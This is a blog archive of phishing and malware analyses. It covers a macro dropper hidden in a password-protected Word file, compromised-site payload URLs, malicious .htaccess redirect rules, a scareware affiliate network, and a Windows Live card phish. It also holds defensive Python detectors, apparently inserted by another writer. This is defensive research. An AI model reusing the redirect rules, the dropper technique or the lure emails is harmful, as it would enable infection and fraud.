Archive for the ‘Phishing’ Category

Good day to you!

Khoroshiy den' dlya tebya!

The other day, I got this cryptic email. It read:

From: Wayne Millbrand <waynem@icon.co.za>
Date: 03/27/2017 2:23 PM (GMT-05:00)
To: ***
Subject: ***

Good day to you!

I have a rather delicate issue, which touches directly to you. Don’t be surprised how do I learned about you! The fact is that I have got already a second letter from the person, I do not know which asserts that you are fraud involved. He insists, that you forced him transfer funds on your PayPal account under fictional reason. However,with this information he pointed out your private data up to address:

First Last Name
Street Address
Town
State (with capitalization error)
Zip Code

Now he is collecting information and planing to contact the police. I advise you to view the information that he sent to me. I have attached Fine.doc with a copy of all of his messages.

Document was password-protected – 4299

Please explain to me what’s happening.  I hope that all of this is a silly misunderstanding.

Best regards,

Wayne Millbrand

Based on the fake email address and the tell-tale Anguished English, I concluded that this was just another phish. 

I usually delete these emails promptly, but this one had an interesting component to it: it came with a password-protected MS Word document. This is somewhat unusual because they typically expect you to just launch the attachment and activate the payload immediately.

So it appears that the attack strategy was to:

  • Send a threatening email
  • Add some publicly available information about the recipient to make it look genuine
  • Encrypt the document in order to hide the payload from an anti-virus scanner
  • Provide the password in the email to allow the user to open and decrypt the file
  • Activate the payload in the MS Word document and infect the user’s machine

Inside the encrypted Word document, I found the following API declarations, variable names, and macro code:

Shell32.dll   ShellExecuteA
Kernel32      GetTempPathA
Kernel32      GetTempFileNameA
URLMon        URLDownloadToFileA

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte
Dim kmvbf As Long
Dim dfety As Long
Dim bvjwi As Long
Dim wbdys As Long
Dim dvywi(256) As Byte
Dim wdals As Long
Dim dwiqh As Long

API Declarations and Variables

[Images: Document Open routine; helper Functions]

This seems to be a variation on an old theme: as soon as the user opens the file, the routine downloads a file from one of these two sources (the second serving as a backup):

h t t p://adenzia.ch/_vti_cnf/bug.gif
h t t p://kingofstreets.de/class/meq.gif

The macro is quite sophisticated; it can even prompt the user to disable their firewall if the download fails. Both GIFs—despite having an appropriate header block and some image content bytes—actually carry the encoded malware.

The macro uses a subroutine to extract the executable binary from the downloaded GIF. It stores the binary in a temp file, appends an “exe” extension to it, and then executes it with the Shell32 API ShellExecuteA in order to install additional malware. In this case, it was ransomware that encrypted the Documents folder.
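To show the defensive side of this, here is an added example (my own code, not the macro from the document) that checks whether a file presenting a GIF header carries an embedded PE executable, which is the layout both bug.gif and meq.gif relied on. The sample bytes are constructed for illustration, not the real downloads.

```python
import struct

# Constructed sample bytes (not the real bug.gif / meq.gif from the post):
# a minimal valid GIF89a header and tiny image body, followed by a fake
# DOS/PE stub whose e_lfanew field correctly points at the "PE\0\0" signature.
GIF_HEADER = (b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"
              + b"\xff\xff\xff\x00\x00\x00")             # 1x1 image, 2-colour table
FAKE_PE = (b"MZ" + b"\x90" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
           + b"PE\x00\x00" + b"\x00" * 32)

SAMPLE_GIF_WITH_PE = GIF_HEADER + b"," + b"\x00" * 20 + FAKE_PE  # PE lands at offset 40
SAMPLE_CLEAN_GIF = GIF_HEADER + b";"                              # trailer only


def looks_like_gif(data: bytes) -> bool:
    """True if the file starts with a GIF87a/GIF89a signature."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def find_embedded_pe(data: bytes):
    """Return the offset of the first plausible PE image inside data, or None.

    'Plausible' means an 'MZ' DOS header whose e_lfanew (DWORD at +0x3C)
    points to a 'PE\\0\\0' signature; a bare 'MZ' pair in pixel data does not count.
    """
    pos = 0
    while True:
        pos = data.find(b"MZ", pos)
        if pos < 0 or pos + 0x40 > len(data):
            return None
        e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
        pe_off = pos + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and data[pe_off:pe_off + 4] == b"PE\x00\x00":
            return pos
        pos += 2


def carve_payload(data: bytes):
    """Return the bytes from the embedded PE onward (for sandbox analysis), or None."""
    off = find_embedded_pe(data)
    return None if off is None else data[off:]


def classify(data: bytes) -> str:
    """Label a downloaded 'image' the way a content filter might."""
    if not looks_like_gif(data):
        return "not-gif"
    off = find_embedded_pe(data)
    return "clean-gif" if off is None else f"gif-with-embedded-pe@{off}"


if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN_GIF), ("trojanized", SAMPLE_GIF_WITH_PE)):
        print(name, classify(blob))
```

A gateway or sandbox can apply the same test to anything fetched by an Office process, regardless of the extension or Content-Type it was served with.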

The installed ransomware in action

Interestingly, the first compromised URL used by the malware was a website belonging to Adenzia.ch, a Swiss accounting and corporate services firm that ironically advertises itself as providing “Privacy and secure Data storage” and:

  Accounting services
  Secure financial services
  Data entry from paper to digital
  Scanning paper data to digital
  Archiving data anonymously

The Adenzia.ch website before and after the breach

The Kingofstreets.de website

Another noteworthy strategy is that both the repurposed Swiss Adenzia.ch financial site and the German kingofstreets.de gaming site required a login. From the attacker’s point of view this is an additional layer of protection: automated security scanners that simply follow the link cannot reach the payload.

From the variable naming convention and the language of the email itself, it seems that the writer is a non-native English speaker. The metadata from the Word document further supports this and suggests a strong link to a Russian origin. First, the author’s name was preserved as виньда (Vinda), and the company name came up as SPecialiST RePack.

SPecialiST RePack Metadata

SPecialiST RePack is a Russian digital publisher that repackages software. According to the Emsisoft malware database, they are a source of a large number of infected files and products.

SPecialiST RePack infected content

As for the unfortunate Adenzia.ch site, it appears to have been breached within the past few months, since the Wayback Machine still shows it operating normally on October 4, 2016.

I’ve tried to contact Adenzia and give them a heads-up that they need to have a look at their network. As of this date, I haven’t heard back from them. This could be an indication that either the site was a front for malware distribution from the get-go, or else it is no longer in business and has been abandoned.

© Copyright 2017 Yaacov Apelbaum, All Rights Reserved.

Anguished English

February 19, 2016

“Thy sin’s not accidental, but a trade.” (from Measure For Measure)

Getting bombarded by Phishers is no fun but sometimes these communications offer some comic relief. This posting is dedicated to the anguished English and linguistic jewels they produce. May the tormented ghost of Shakespeare continue to sabotage their exploits.

Here are my top ten favorites:

1. Starting the message in one language and then switching to another as in “Dear Cliente,”

2. Getting subject verb agreement wrong as in “Your account just make…”

3. Poor punctuation as in “Due to concerns, for safety and the integrity…”

4. Nonsense content as in “Most of your date in our database were encrypted…”

5. Poor formatting as in missing a space after a period.that’s right.

6. Wrong capitalization as in “This is the Last reminder…”

7. Poor grammar as in “If this message sent as Junk or Spam, its just an error…”

8. Excessive use of exclamation marks as in “Update Required!!”

9. Poor spelling as in “It has come to out [our] attention that…”

10. Failure to do basic arithmetic accurately as in “$254.99 + $20.00 = $374.99”

[Images: PayPal phishing email samples 1 through 10]

© Copyright 2016 Yaacov Apelbaum, All Rights Reserved.


The Anti-Virus Virus Part II

January 2, 2011

In The Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SEO’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware (a variety of bogus anti-virus applications) is downloaded when you click on a link in a page returned by a search engine. The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because, in order for it to work, it requires the user to visit the site indirectly. If you navigate to the site via a bookmark or manually enter the address, it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site, and thus delays its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines (which forms the majority of visits) will keep getting redirected to the malware download.

The underlying technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The result of this re-route is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.
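An added example, not from the original post: a small audit script that reads an .htaccess file and flags RewriteRules that send visitors off-site only when the referer is a search engine, plus ErrorDocument directives that point off-site, which is exactly what the modified files described above look like. The sample .htaccess text and the hostnames in it are constructed placeholders.

```python
from urllib.parse import urlparse

# Constructed sample modelled on the fragment in the post; the redirect
# target is a placeholder, not a real site. The last rule is benign, for contrast.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://malware-site.example/ [R=301,L]
ErrorDocument 404 http://malware-site.example/
# a benign rule for comparison
RewriteRule ^old-page$ /new-page [R=301,L]
"""

SEARCH_ENGINES = ("google", "yahoo", "msn", "bing")


def _is_external(target: str, own_host: str) -> bool:
    """True if target is an absolute http(s) URL whose host is not our own."""
    p = urlparse(target)
    return p.scheme in ("http", "https") and p.hostname not in (None, own_host)


def audit_htaccess(text: str, own_host: str):
    """Return a list of (line_no, reason) findings for suspicious directives.

    RewriteCond lines only apply to the next RewriteRule, so conditions are
    accumulated and reset each time a RewriteRule is seen.
    """
    findings = []
    pending_referer_conds = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}":
                pending_referer_conds.append((no, parts[2]))
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            conds, pending_referer_conds = pending_referer_conds, []
            if _is_external(target, own_host):
                hit = [n for n, pat in conds
                       if any(s in pat.lower() for s in SEARCH_ENGINES)]
                if hit:
                    findings.append((no, f"referer-conditioned redirect to {target} "
                                         f"(search-engine conditions at lines {hit})"))
                else:
                    findings.append((no, f"external redirect to {target}"))
            continue
        if directive == "errordocument" and len(parts) >= 3 \
                and _is_external(parts[2], own_host):
            findings.append((no, f"ErrorDocument {parts[1]} redirects off-site to {parts[2]}"))
    return findings


if __name__ == "__main__":
    for line_no, reason in audit_htaccess(SAMPLE_HTACCESS, "victim-site.example"):
        print(f"line {line_no}: {reason}")
```

Because the redirect only fires for search-engine referers, a site owner should also fetch their own pages with a search-engine Referer header (or with curl and an explicit -e value) rather than trusting what they see from a bookmark.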

Source and Authorship

I loaded Process Monitor and installed the copy of Antivirus 2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional. The installation created an entire registry hive that included several autoruns, browser search redirects, and a rootkit. I then fired up TCPView and examined the application’s outgoing communication. It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev). The domains associated with the servers were registered by Bakasoftware.com, which is currently hosted in Canada.

Interestingly, upon startup, the malware called the GetKeyboardLayout API and checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, further proof that the designers targeted English users. The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution

For software to be commercially viable, it must have effective marketing and distribution channels. The bogus Antivirus is no exception. It turns out that even a few US companies have been associated with the distribution of this software. Several of them have been named as defendants in the Federal Trade Commission’s complaint. These include Innovative Marketing, Inc., a US company registered in Belize, and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributors including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants used complex online advertising techniques that violate fair trade law in order to push a large number of fake security or system maintenance products including “WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.

In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called "Scareware" applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.

According to court records, as of February 11, 2009, Jain is officially listed as a fugitive from justice in the United States.

Affiliate Program

The affiliate program is made up of a network of associates. Once a member like Sam Jain is accepted into the program, he is given access to an enterprise control panel that lets him distribute different flavors of malware, along with a number of techniques for infecting internet-connected computers. Affiliates can make between 58 and 90 percent commission on sales of the software. Such generous commissions explain why these types of malware products are so popular among spammers.
Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament to their professionalism, the affiliate members have access to a sophisticated web-based statistics dashboard. In it, the franchise owner can view KPIs that include: number of daily installs, number of purchases by victim (including the victim’s credit card number), refunds (chargebacks), and commissions. With such access to real-time sales analytics, they are the envy of many Fortune 500 sales organizations.

Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 copies of the software in exactly 10 days and managed to get 2,772 of those victims to buy the cure. Any commission sales rep will tell you that a 2% conversion rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year. That’s some pocket change.

Who says that crime doesn’t pay?

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

Windows Live Credit Card Phishing

December 10, 2009

I recently received an email claiming to be from Microsoft Live. The email stated that due to some processing issues, they could not authorize my credit card and so I would need to login to their website to update my credit card information by clicking on their link.

Over the years, I have seen a number of these types of messages, but this was the first one targeting me personally. After skimming through it, I realized that it was a blatant phishing attempt; nevertheless, I still marveled at the ingenuity of the scammers.


Billing and Account Management

Dear Windows Live Hotmail member,
During our regularly scheduled account maintenance and verification procedures, our billing department was unable to authorize your current payment method information.

This might be due to either of the following reasons:

  1. A recent change in your personal information (i.e. change of address, credit card)
  2. Submitting invalid information during the initial Sign Up or upgrade process.
  3. An inability to accurately verify your selected payment method information due to an internal error within our processors.

Please use the following link to update your payment method information :

http://billing.microsoft.com/logon.srf?action=SignIn&reason=auth&type=auto&uid=187&acct=49472101102

The above link may have been blocked for your privacy. To activate the link please look for the Show content link that is usually located on top of this message.

NOTE! If your account information is not updated within 48 hours then your ability to use your Windows Live Hotmail account will become restricted.

Thank you for using Windows Live Hotmail!
Please do not reply to this e-mail, as this is an unmonitored alias.

© 2009 Microsoft Corporation. All rights reserved.


Anatomy of a Phish


For the uninitiated, phishing (pronounced “fishing”) is a fraudulent attempt to acquire sensitive information from a user. Such information can be: credit cards, user IDs, passwords, and/or account information. It is often accomplished via email or phone.

Phishing falls into the category of exploits known as “social engineering”. Even though they are mostly low tech (requiring neither sophisticated technology nor advanced programming), they can be successful (especially the well-executed and new ones) because most people tend instinctively to do what they are told and will not challenge the authority and authenticity of what seems to be an official correspondence.

In a typical phishing scenario, the perpetrators (usually located offshore) send a simple email claiming to be from the customer service department of a recognizable organization (like a bank, on-line service, etc.). The email will inform you of some problem with your account. You are then instructed to provide details of your bank, email, or credit card account in order to correct this problem.

Even though phishing exploits can have many variations, they can be grouped into the following five scenarios:

1. Forged identities — In this exploit, the attacker creates an email address that is related to a reputable organization like “Windows Live Customer Support”. Even though on the surface, their email address looks legitimate (as in: billing@windowslive.com), it is not. If you’re not paying attention, it can be easy to mistake a message like this for a genuine customer support request.

2. Compromised accounts — In this exploit, the attacker uses a compromised user account to send an email to everyone in the address book for that account. An email you receive from a known account dramatically increases the credibility of that message, and therefore the likelihood of a successful phishing attack.

3. Direct phone calls — In this exploit, the scammer may contact you directly by phone, telling you that they work for some financial institution (they may offer to lower your interest rates) or for its fraud investigation department. They will inform you that your account has been breached and will directly ask you for your account details in order to verify it.

4. Bogus websites — In this exploit, the attacker will send you a link to what seems to be a functional website. The site will include official-looking logos, language, or other identifying information taken directly from a legitimate website. The address of the site will resemble the name of a reputable company but with some spelling variations. For example, the name “microsoft.live.com” could appear instead as “micorsoft.live.com”.

5. Social Network Harvesting — In this exploit, a communication from a scammer will ask you for personal information. You may mistake it for an email from a friend wanting to reconnect. The email will include convincing details about your personal life which were harvested from social networks such as LinkedIn, Facebook, etc.

In general, the objective of phishing is to recover your webmail credentials, since the resale value of a legitimate webmail account on the black market can be as high as $2-$3—twice the amount they could get for a stolen credit card number. So for a phisher, breaching several dozen accounts a day can be a lucrative business, making $100K-$500K over the life of the scam.

In the case of my phishing email, when I followed the link in it, I was taken to a credit card entry form (Image 1). As I expected, the form looked genuine; it had all the right corporate trimmings: a Microsoft logo, a copyright notice, and even a link to a help page (which ironically offered the following advice: “You should keep this number secret, protect it, and never write it on your card.”)

Image 1: Phishing Credit Card Entry Form

As with most phishing sites, I was expecting to find some bogus or misspelled Microsoft URL, but instead I was surprised to see that the web address of the page actually belonged to a company called Human & Technology (H&T) (Image 2); clearly, htech21.com doesn’t even sound like Microsoft. I checked the parent URL out and it turns out that this company was at one point a legitimate Korean hardware manufacturer; then, two years ago, their CEO was arrested and the company became the target of one of the biggest class-action lawsuits in history.

[Image: CEO Jeong Kuk-Kyo]

So what is the connection between htech21.com and this phishing expedition? It appears that the perpetrators of this scam decided to cut some costs: instead of purchasing and hosting their own domain, they chose to break into the H&T corporate web site and place their credit card collection pages on it. At some point, our scammers discovered that Human & Technology had gone out of business (this could also have been an inside job) and safely assumed that this orphaned website (which had not been updated for 3 years) was no longer being maintained or monitored, and as such, was a perfect staging platform for a phishing operation.

It is also interesting to note that the site’s help file focused on ATMs (Automated Teller Machines), which strongly suggests that at least some of the phishing website’s contents have also been used in other scams.

Image 2: Phishing Host Website (Korean and English versions)

It is hard to distinguish legitimate customer service communications from phishing expeditions. This difficulty is further compounded by the fact that for many, using services such as Amazon, eBay, and e-banking has now become a way of life. For most users, the potential inconvenience of being locked out of their favorite on-line services outweighs the risk of disclosing their account information. Unfortunately, the on-line services are not helping this situation either, because most are either impossible to reach by phone or their offshore support centers are largely useless.

So how does one survive in the hostile jungle of email exploits? The following are my top 10 Do’s and Don’ts of email:

1.  Do Not open emails that have a wrong or incorrect spelling of your name. Phishers often harvest email addresses in bulk and may not have your full name. Because of this, they will try to guess your name from your email address.

2.  Do Not open emails that are not addressed to you by name. Phishers will almost never personalize correspondence; they will refer to you as “Dear Customer” or “Dear Valued Customer” because they send bulk solicitations to millions of email addresses.

3.  Do Not respond to any account management email requests that come from your bank. If your bank needs to reach you, they will send you an official letter or leave you a voice mail with a valid callback telephone number.

4.  Do Not open unsolicited emails. Nothing in life is free, this includes the invitation to view naked celebrities and the Prozac and Viagra offers in your inbox.

5.  Do Not use email links to go to any financial websites. Type in the URL yourself and save it as a bookmark.

6.  Do verify the website URL you are about to log into; check the spelling carefully before you provide your login details on any web page. Pay close attention to the domain name following the “http://” section of the address. Many phishers will intentionally create very long names to obfuscate the fake URL.

7.  Do log in to your on-line accounts regularly and look for unrecognized transactions.  Do the same with your monthly credit card statements.

8.  Do Not send your account details via email to anyone. Email traffic is unencrypted, so anyone en route can intercept the message.

9.  Do check that the Internet connection you are using is secure. Look for HTTPS in the address field of your browser. You may also want to click on the padlock (encrypted connection icon) to view the actual server certificate. This will help you verify that it was issued by a reputable authority and assigned to the company managing the website in question.

10.  Do make sure that you have updated anti-virus software and that your firewall is turned on.
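As an added example tied to items 4 and 6 above (my own code, not the author’s): a checker that looks only at the host between “http://” and the next slash and classifies it as trusted, as a brand name buried in the subdomain of an unrelated domain, as a near-miss spelling, or as unrelated (like the htech21.com host that served the form in this post). The trusted-domain list and the test URLs are constructed for illustration; feed it the actual link target from the message source, not the text the email displays.

```python
from urllib.parse import urlparse

# Constructed watch-list: the domains the reader actually does business with.
TRUSTED = {"microsoft.com", "live.com", "paypal.com"}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Adequate for the .com examples in this post;
    a real deployment would consult the Public Suffix List for co.uk and friends."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (insert, delete and substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_url(url: str, trusted=TRUSTED):
    """Return (verdict, registrable_domain) for the host actually named in url.

    verdict is one of: 'trusted', 'brand-in-subdomain', 'lookalike', 'unrelated'.
    Only the host matters: path, query and the visible link text are ignored,
    which is the point of checklist item 6.
    """
    host = urlparse(url).hostname or ""
    reg = registrable_domain(host)
    if reg in trusted:
        return ("trusted", reg)
    labels = host.lower().split(".")
    for t in sorted(trusted):
        if t.split(".")[0] in labels:     # e.g. microsoft.live.com.evil.example
            return ("brand-in-subdomain", reg)
    for t in sorted(trusted):
        if edit_distance(reg, t) <= 2:    # e.g. micorsoft.com, paypa1.com
            return ("lookalike", reg)
    return ("unrelated", reg)


if __name__ == "__main__":
    for u in ("http://billing.microsoft.com/logon.srf?action=SignIn",
              "http://microsoft.live.com.evil.example/login",
              "http://micorsoft.com/",
              "http://www.htech21.com/billing/"):
        print(u, "->", assess_url(u))
```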

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.